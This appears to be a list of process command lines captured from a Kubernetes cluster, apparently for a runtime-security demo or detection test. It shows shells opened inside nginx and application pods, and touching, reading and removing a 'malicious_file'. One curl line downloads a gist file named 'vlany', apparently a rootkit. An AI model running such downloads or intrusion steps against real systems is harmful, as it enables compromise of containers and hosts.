base64 -d
bash
bash -c hostname
calico-node -felix-live -bird-live
calico-node -felix-ready -bird-ready
cat malicious_file
check-status -r
curl https://gist.githubusercontent.com/mateobur/d888e36de12f8fe42a18f54ce4b1fc7c/raw/dd0c4cb23db7cc17a2086c5dee9338522fb8ae69/vlany
curl www.google.com
cut -d  -f 1
grep Running
grep hashbrowns
grep malicious_file
grep nginx
head -n 1
hostname
kubectl exec -it hashbrowns-7b86794d7d-485fg -n example-go-app bash
kubectl exec -it nginx-76f9cf7469-k5kf7 -n nginx bash
kubectl get pods -n example-go-app
kubectl get pods -n nginx
ls
pause
ps -el
rm malicious_file
sh -c /bin/stty sane < /dev/pts/0
sh -c /bin/stty sane < /dev/pts/1
sh -c kubectl exec -it `kubectl get pods -n example-go-app | grep hashbrowns | grep Running | head -n 1 | cut -d' ' -f 1` -n example-go-app bash
sh -c kubectl exec -it `kubectl get pods -n nginx | grep nginx | grep Running | head -n 1 | cut -d' ' -f 1` -n nginx bash
stty sane
sv status /etc/service/enabled/bird
sv status /etc/service/enabled/confd
touch malicious_file